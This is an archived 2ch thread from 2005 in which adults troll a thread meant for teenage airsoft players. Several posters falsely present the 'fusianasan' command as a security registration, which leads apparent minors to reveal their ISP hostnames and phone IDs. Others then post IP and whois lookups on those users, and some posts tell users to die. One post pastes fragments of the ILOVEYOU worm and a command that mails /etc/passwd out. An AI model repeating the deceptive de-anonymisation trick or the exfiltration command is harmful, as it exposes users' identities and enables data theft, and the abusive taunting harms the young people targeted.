5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【中高生以外】中学、高校のみ集合【立ち入り禁止】

1 :大佐:2005/03/30(水) 22:48:22
ここは、中学、高校生のレスにします。
よって中学、高校生、以外立ち入り禁止です
荒らしが来たら完全無視で
勿論反応した人も荒らしです。
意見ある人は別にレス立ててそこで勝手にしてください。

2 :大佐:2005/03/30(水) 22:49:39
別に集まらなくても好いんだけどW

3 :>>1の母です:2005/03/30(水) 22:50:09
1の母でございます。


このたびは、息子がこのような日記ページを作ってしまい、
皆様には大変ご迷惑をおかけしております。
深くお詫び申し上げます。
息子は幼い頃に父親を亡くし、
そのショックで内気な子供になってしまいました。
そのせいか、小中学校ではいじめにあっていたのです。
この年になるまで、恋人はおろか友達さえもいないようで、
大変心配しておりましたが、
ファイナルファンタジーXIというゲームを知って以来、
息子も少し明るくなったようです。
「今日古墳でね、パーティーの内藤様がさあ...」
と、とても楽しそうに夕食の時に話してくれるのです。
どうぞ皆様、息子を暖かく迎えてやってくださいまし。
本当は良い子なんです。
よろしくお願い申し上げます。
1の母より

4 :名無し迷彩:2005/03/30(水) 22:50:51
俺は中学、高校生だ。
間違いない。

5 :名無し迷彩:2005/03/30(水) 22:51:18
氏ね

6 :名無し迷彩:2005/03/30(水) 22:51:57
長々しすぎ

7 :名無し迷彩:2005/03/30(水) 22:52:00
氏ね

8 :名無し迷彩:2005/03/30(水) 22:52:32
>>1.2.3
お前らは荒らしだ!
無視だ!無視!!
なぜなら俺は中学、高校生だ。
間違いない。

9 :名無し迷彩:2005/03/30(水) 22:52:44
>>1
……キモスwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

10 :名無し迷彩:2005/03/30(水) 22:53:20
賢い中学、高校生はサバゲーなんてやっちゃだめだよ。
大体、君たちどうやってウェポン買ってるの?
18歳未満は買えないんだよ。
よい子は買っちゃダメですよ。

11 :大佐:2005/03/30(水) 22:53:22
変更荒らしに少しなら反応してもよし!

12 :大佐:2005/03/30(水) 22:54:34
3はワロタW

13 :大佐:2005/03/30(水) 22:54:37
かかって来い!糞共!

14 :名無し迷彩:2005/03/30(水) 22:54:40
>>3
おか〜さ〜ん♪ティシュが、なぁ〜いよぉ〜♪

15 :大佐:2005/03/30(水) 22:55:14
>>1
氏ね

16 :名無し迷彩:2005/03/30(水) 22:56:03
ヽ(゚∀゚)ノ祭りか?

17 :名無し迷彩:2005/03/30(水) 22:56:59
>>12
>>3ゴトキのコピペに笑うなんてお前やっぱザの人間だろ?
それか2ch歴1年未満?wwwwwwwwwwwwwwwwwwwwww


18 :名無し迷彩:2005/03/30(水) 22:57:00
名前つけたらたたかれるから付けんのやめた

19 :名無し迷彩:2005/03/30(水) 22:57:13
そうか・・・・反応しても良いのか・・・・

ピコ−ン!ピコ−ン!ピコ−ン!ピコ−ン!

20 :名無し迷彩:2005/03/30(水) 22:57:26
>>1重複だ!!
似たようなスレ有るか探してからスレ立てろ
【装備自慢】高校生でサバゲーW【妄想彼女】
http://hobby5.2ch.net/test/read.cgi/gun/1091368819/


21 :名無し迷彩:2005/03/30(水) 22:57:38
ちゃんとパパとママの許可は取ってるの?
君たちが怪我したとき誰が責任とるの?
一緒にやってる大人たちのせいになるでしょ?
君たちみたいなのがエアガンの犯罪に手を染めるんだよ。
その時に君たちは責任取れるの?
ちゃんと18歳になってからやりましょう。

22 :名無し迷彩:2005/03/30(水) 22:58:17
17
そうですが何か?

23 :名無し迷彩:2005/03/30(水) 22:59:19
削除依頼出して回線切って首吊ってコイ糞厨房

24 :名無し迷彩:2005/03/30(水) 22:59:25
>>18
逃げるんじゃない!立ち向かえ!!
お前の人生、それでいいのか!?
将来、土方になりたいんだろ!!

25 :名無し迷彩:2005/03/30(水) 23:01:25
良い子は責任の取れる年齢になってからやりましょう。

26 :名無し迷彩:2005/03/30(水) 23:05:56
ココはガキの来る所じゃねーんだよ。
怖ぇー戦場だぜ。
この、がきゃ10分早ぇーんだよ!!!!!
10分後に、又、お越し頂けますか?


27 :名無し迷彩:2005/03/30(水) 23:06:01
>>22
右派wwwwwwwwwwwwwwwwwwwwwwキモスwwwwwwwwwwwwwwwwwwwwwwwwwwwww

28 :名無し迷彩:2005/03/30(水) 23:08:39
26
わかりますた

29 :名無し迷彩:2005/03/30(水) 23:08:53
>>22
またザか!!ホント、ザはキモイ奴しか居ないな…
お前はさっさと座にカエレ

30 :名無し迷彩:2005/03/30(水) 23:10:36
釣りスレ乙

31 :名無し迷彩:2005/03/30(水) 23:12:21
>>28
素直な良い子じゃねーか!!!
イジメる奴は29が殺すと言ってました。


32 :名無し迷彩:2005/03/30(水) 23:14:55
>>29
おい”殺す”は、まずいぞ。
お前の家にはテレビは無いのか?


33 :名無し迷彩:2005/03/30(水) 23:17:59
>>31-32
言ってねーよ!!
>>10が頃スとかいっていないとか

34 :名無し迷彩:2005/03/30(水) 23:20:15
ザでいじめらたんでここで構ってほしいです

35 :名無し迷彩:2005/03/30(水) 23:21:41
10は、なかなかの悪だな。
危うく29を通報する所だったぜ!


36 :名無し迷彩:2005/03/30(水) 23:23:24
>>34
構ってやるから、E-mail:の所にhageって入れろ!

37 :名無し迷彩:2005/03/30(水) 23:24:23
>>34
つかこのスレ、削除依頼出てるからもうじき消えるよ
http://hobby5.2ch.net/test/read.cgi/gun/1046655315/837

38 :名無し迷彩:2005/03/30(水) 23:25:56
>>37
そうか、このスレも後3年の命か・・・

39 :名無し迷彩:2005/03/30(水) 23:26:20
>>34
名前欄にmurorusianasangunzukiと入れると偽者が出なくていいよ

40 :39訂正:2005/03/30(水) 23:27:13
名前欄にmurofusianasangunzukiと入れると偽者が出なくていいよ


41 :名無し迷彩:2005/03/30(水) 23:28:44
スンスンスーン!!(・∀・)!!ンースンスンス

42 :muro i220-108-220-43.s02.a013.ap.plala.or.jpgunzuki:2005/03/30(水) 23:28:53
ありがトン

43 :名無し迷彩:2005/03/30(水) 23:30:55
>>42
Domain Information: [ドメイン情報]
a. [ドメイン名] PLALA.OR.JP
b. [ねっとわーくさーびすめい] ぷらら
c. [ネットワークサービス名] ぷらら
d. [Network Service Name] PLALA
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MN2905JP
n. [技術連絡担当者] TF236JP
p. [ネームサーバ] dns1.plala.or.jp
p. [ネームサーバ] dns2.plala.or.jp
p. [ネームサーバ] ns2.sphere.ad.jp
[状態] Connected (2005/07/31)
[登録年月日] 1996/07/24
[接続年月日] 1996/07/31
[最終更新] 2004/08/01 01:10:28 (JST)



44 :名無し迷彩:2005/03/30(水) 23:32:21
来ました

45 :muro i220-108-220-43.s02.a013.ap.plala.or.jpgunzuki:2005/03/30(水) 23:32:43
>>[接続年月日] 1996/07/31
これは何?

46 :名無し迷彩:2005/03/30(水) 23:33:33
>>42オメ!!
これで偽者が現れないですむね。
これからもそのままでいた方が良いよ

47 :名無し迷彩:2005/03/30(水) 23:34:37
なんじゃこりゃ

48 :名無し迷彩:2005/03/30(水) 23:35:29
>>47
厨房隊VS煽りの大人合戦スレです

49 :名無し迷彩:2005/03/30(水) 23:38:11
48スマソ47書いたの1の私です紛らわしかった

50 :名無し迷彩:2005/03/30(水) 23:38:15
>>42オメ
IPアドレス 220.108.220.43
ホスト名 i220-108-220-43.s02.a013.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL


51 :名無し迷彩:2005/03/30(水) 23:44:13
50のなに?

52 :名無し迷彩:2005/03/30(水) 23:45:14
>>46
偽者が現れないのは確かだな

53 :名無し迷彩:2005/03/30(水) 23:50:32
>>51
>>42が登録した、【2ch同好会】の会員登録情報だよ。
>>51お前も>>40やっとけよ。
ここにいるみんなは、【2ch同好会】に入ってるからな。
【2ch同好会】に入ってると情報が他へ漏れなくなるし良いとこ尽くしだよ。

54 :名無し迷彩:2005/03/30(水) 23:50:46
フシアナに引っかかる奴なんてまだ居たのか。

55 :名無し迷彩:2005/03/30(水) 23:51:40
質問
2チャンネラーはなぜ厨房工房きらう?

56 :名無し迷彩:2005/03/30(水) 23:53:04
>>55
坊やだからさ

57 :名無し迷彩:2005/03/30(水) 23:53:25
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。
SGに登録せずに書き込んだ場合、
あなたのパソコン内の情報が他人に見られる恐れがあります。
初期の頃から2ちゃんねるにいる方達はかなりのスキルとこのBBSのコマンドを知っています
ですから簡単にあなたのIPアドレス等抜かれ、住所まで公開された人も数多くおり
社会的に抹殺されてしまう。それが2ちゃんねるの隠れた素顔でもあります
SGしておけばまず抜かれるコマンド自体が無効になってしまうので
どんなにスキルがある人でもIPアドレスを抜くことが不可能になります

SGに登録する方法は、名前欄に「 fusianasan 」と入れる。

これでSGの登録は完了します
一度登録すれば、電話番号を変えない限り継続されます。
2ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。
fusianasanは、正式にはフュージャネイザン、
又はフュジャネイザンと読みます。
元々はアメリカの学生達の間で、チャットの時に
セキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、
2ちゃんにカキコしてたらウィルスに感染したとか、
個人情報が漏れた等の抗議がうざったくなったひろゆきが、
仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。


58 :名無し迷彩:2005/03/30(水) 23:56:05
>>57
フュジャネイザンな…
俺も昔登録したよ。登録したか知らんが、全然ウイルスにも感染しないし

59 :350265000683842:2005/03/30(水) 23:58:18
これでいいですか?

60 :名無し迷彩:2005/03/31(木) 00:05:17
>>59
携帯から接続か…
最近の厨房は良い身分になったもんだ。自分で金も払えないくせに

61 :名無し迷彩:2005/03/31(木) 00:09:10
何でわかったんですか?

62 :名無し迷彩:2005/03/31(木) 00:11:58
>>61
フュザネイザンの登録情報は一度皆に開示されてから登録されるんだよ。
だからさ。350265000683842←この番号のみの羅列は携帯しか出ない。
しかもこれはDoCoMoでも無いな…。auってとこかな?

63 :名無し迷彩:2005/03/31(木) 00:14:29
ありがとうございます丁寧に教えていただいて
ちなみにケータイFOMAです

64 :名無し迷彩:2005/03/31(木) 00:15:07
>>63
第三世代か…
最近の子供は良い身分になったもんだ…。

65 :名無し迷彩:2005/03/31(木) 00:15:39
ネットの基本も知らずに2ちゃんかよ
厨房は社会のお荷物だな。

66 :名無し迷彩:2005/03/31(木) 00:18:43
>>42>>59

  m9 三 9m
 ノノ       ミ
m9  (^Д^)  9mプギャプギャプギャプギャーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーッ!!!!!!!!!!!!!!!!!!!!!!
 ヾヽ      彡
  m9 三 9m

2chはお前らなんかには優しくネーンダヨ。
ザにでもカエレm9っ`・ω・´) !!

67 :名無し迷彩:2005/03/31(木) 00:24:57
/////

68 :名無し迷彩:2005/03/31(木) 00:25:41
危ない、危ない♪

69 :muro i60-34-247-214.s02.a013.ap.plala.or.jpgunzuki:2005/03/31(木) 00:28:14
test

70 :名無し迷彩:2005/03/31(木) 00:28:52
しかしザの掲示板暇な時チラチラみてるがひどいよな。
自分の知識を同じクラスの奴にひけらかして

「あーはいはい詳しいね」ってよく言われます(笑)

と自慢気に書いてたのが一番印象に残ってるな

71 :名無し迷彩:2005/03/31(木) 00:29:40
2chでは>>65,66みたいなやつのことを厨房と言うと思ってたんだが違うのか?


72 :名無し迷彩:2005/03/31(木) 00:29:41
釣堀はここですか?

73 :名無し迷彩:2005/03/31(木) 00:30:17
>>70
ザはしったかぶり厨房が多いよな。

74 :名無し迷彩:2005/03/31(木) 00:33:57
こ れ は も う だ め か も わ か ら ん ね

パワー!パワー!

ディセント!!

ハイドロ全部駄目?

75 :muro i60-36-112-212.s02.a013.ap.plala.or.jpgunzuki:2005/03/31(木) 00:35:59


76 :名無し迷彩:2005/03/31(木) 00:38:55
ザってよくみますけどなんですか? 2チャン初心者なものですみません

77 :名無し迷彩:2005/03/31(木) 00:41:49
んん。

78 :名無し迷彩:2005/03/31(木) 00:42:51
>>69
実験は他所でやりなさい。

79 :名無し迷彩:2005/03/31(木) 00:44:58
>>76
ザ掲示板若しくはザBBSでググれ(検索しろ)

>>75
>>74は有名な言葉だよ。
日航機御巣鷹山墜落事故で機長が言った言葉
詳しくはココを見ろ
http://cat.zero.ad.jp/~zak46939/_osutaka/osutaka.html

80 :名無し迷彩:2005/03/31(木) 01:07:46
でませんでした

81 :名無し迷彩:2005/03/31(木) 01:12:40
>>80
なら再登録が必要だ
名前欄に「2005年03月31日【ここに自分の年齢】山崎渉」と書いて
本文欄に住んでる都道府県名を入力すべし。

82 :【56】 i220-220-231-5.s02.a013.ap.plala.or.jp:2005/03/31(木) 01:17:04
>>81
名前が長杉ます。だって・・・・

83 :i220-220-119-151.s02.a013.ap.plala.or.jp:2005/03/31(木) 01:21:14
test

84 :名無し迷彩:2005/03/31(木) 01:21:36
82と同文です

85 :名無し迷彩:2005/03/31(木) 01:22:14
山崎渉がキーワードだね。

86 :山崎歩:2005/03/31(木) 01:23:03
test

87 :名無し迷彩:2005/03/31(木) 01:23:24
わざとか?わざとなのか?

88 :名無し迷彩:2005/03/31(木) 01:23:55
ぷらら厨多いなぁ(wwwww

89 :名無し迷彩:2005/03/31(木) 01:26:52
>>88
違うよ、俺一人だよ。
ADSLだから接続都度IPが変わるだけ。

90 :名無し迷彩:2005/03/31(木) 01:26:57
>>84
すまん。日付は最近登録に必要ないらしい。
【ここに自分の年齢】山崎渉 のみで入力してくれ

91 :名無し迷彩:2005/03/31(木) 01:29:15
恥ずかしいんですが山崎なんですか読めない

92 :名無し迷彩:2005/03/31(木) 01:31:11
わたる

93 :【16】 350265000683842:2005/03/31(木) 01:33:03
何から何まですみません

94 :名無し迷彩:2005/03/31(木) 01:33:55
恥ずかしかぁ〜無いよ
人名、地名は難しいよ

95 :名無し迷彩:2005/03/31(木) 01:36:11
したあとどうするんですか?

96 :大佐:2005/03/31(木) 01:36:20
よし、大佐祭りだ

97 :大佐:2005/03/31(木) 01:40:02
>>したあとどうするんですか?
何をしたんだ?
タバコでも吸ってみたら?

98 :名無し迷彩:2005/03/31(木) 01:40:23
大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大差大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐大佐

99 :大佐:2005/03/31(木) 01:42:44
>>98
ウォーリーを探せか?

ちなみに、右上2番め。

100 :350265000683842:2005/03/31(木) 01:43:24


101 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 01:44:51
ちぃ

102 :大佐◇XSwpGtlyYo:2005/03/31(木) 01:49:03
左だったら分からんかったかも。

103 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 01:51:36
左にしとけばよかった…〇| ̄|_

104 :05004010620428_vg:2005/03/31(木) 02:08:35
携帯からテス

105 :名無し迷彩:2005/03/31(木) 02:13:50
このスレ、厨房ばっかだ。早く削除されないかな?

106 :ふぃーるど(略 ◆FIELDafaho :2005/03/31(木) 02:52:26
さっくりと削除するのと、ふしあな記念にスレストしてdat保存、どっちが良い? >>105さん



107 :名無し迷彩:2005/03/31(木) 03:08:56 ?#
nullpo

108 :名無し迷彩:2005/03/31(木) 03:13:46
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

109 :105:2005/03/31(木) 03:14:28
>>106
フシアナ大量記念として伝説のスレに載せてもらえませんか?
無理ですかネェ?

110 :105:2005/03/31(木) 03:18:22
>>106
ココのttp://f44.aaa.livedoor.jp/~loglog/伝説のスレッドと言うカテゴリーに入れていただきたいなぁ…
フシアナ記念として…

111 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 07:46:46
どうぞ入れてください
ところでフシアナってなんですか?

112 :名無し迷彩:2005/03/31(木) 11:14:12
荒らしてもいいですか?

113 :名無し迷彩:2005/03/31(木) 11:51:13
>>1
どう見ても釣りだから荒らすがよろし

114 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 14:27:09
適当にもう荒らしていいよ

115 :名無し迷彩:2005/03/31(木) 16:10:09
>>114
責任取れカス

116 :名無し迷彩:2005/03/31(木) 16:36:35
削除依頼出してこいカス

117 :名無し迷彩:2005/03/31(木) 16:40:03
大佐 ◆XSwpGtlyYo
      ↑
・カス
・チンカス
・酒粕

どれだ?

118 :名無し迷彩:2005/03/31(木) 16:45:10
>>111
メール欄に「fusianasan」って入れたらそれ以降、IDが「???」になるの。
この板ではID有効じゃないけど、他の板で「ID???」って見たことあるでしょ?それです。
いきなりどっかのスレで「fusianasan」やると初心者だって叩かれるから普通はみんなこういう荒れてるスレでやる。
大佐さんもやったほうが安全だと思うが・・・。 まあ叩かれるかもな。

119 :YahooBB220006088025.bbtec.net:2005/03/31(木) 16:50:17
テスト

120 :名無し迷彩:2005/03/31(木) 17:00:11
>>119
ヤフー厨か

IPアドレス 対応するIPアドレスがありません
ホスト名 YahooBB220006088025.bbtec.net
IPアドレス
 割当国 日本
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし


121 :名無し迷彩:2005/03/31(木) 17:00:43
>>116
このスレ、すでに削除依頼が出てるよ。

122 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 17:59:47
117
すべて!

123 :名無し迷彩:2005/03/31(木) 18:08:42
フラップアップ!

124 :名無し迷彩:2005/03/31(木) 18:33:45
これはだめかもわからんね

125 :P220-226-228-230.l02.550.ch.sig.com:2005/03/31(木) 18:34:59
テスト

126 :名無し迷彩:2005/03/31(木) 19:14:57
>>125
ワロタ

127 :名無し迷彩:2005/03/31(木) 19:51:31
お前らちょっと酷くない?
つーかほいほい信用するな。
自分が騙されてることも分かってないんだろうな。

128 :名無し迷彩:2005/03/31(木) 20:00:03
>>1
面白い動画あげるよ
ttp://www.geocities.jp/vipex10/index.html
ttp://www.geocities.jp/vipex10/danger.html
ttp://www.albinoblacksheep.com/flash/you.html

http://www.geocities.jp/vipex10/profile.swf


129 :名無し迷彩:2005/03/31(木) 21:28:55
y8onl

130 :大佐 ◆XSwpGtlyYo :2005/03/31(木) 22:54:15
削除依頼だす板ってどこ?

131 :名無し迷彩:2005/03/31(木) 22:58:20
>>130
もう俺がだいぶ前に出してるわ。アホ

132 :名無し迷彩:2005/04/01(金) 00:04:13
>>131
削除されてないじゃないか。アホ

133 :名無し迷彩:皇紀2665/04/01(金) 00:11:56
131
ほんとよ市ね市ね

134 :名無し迷彩:皇紀2665/04/01(金) 00:16:51
「fusianasan」してから本当に「ID???」に
なりました!☆

135 : ◆JGSDF.qsK2 :皇紀2665/04/01(金) 00:21:15
皇紀になってる!!
いぃぃぃやったぁぁぁぁ!!


136 :ふぃーるど(略 ◆FIELDafaho :皇紀2665/04/01(金) 02:59:26
>>109-110さん
そこは2ch管理じゃないから、私にはなんとも…(^_^;
って、よく見て見たら、ニダさんのところか。
んじゃ、一応スレストにして、ニダさんに連絡だけ入れておきます。

で、スレスト↓


137 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)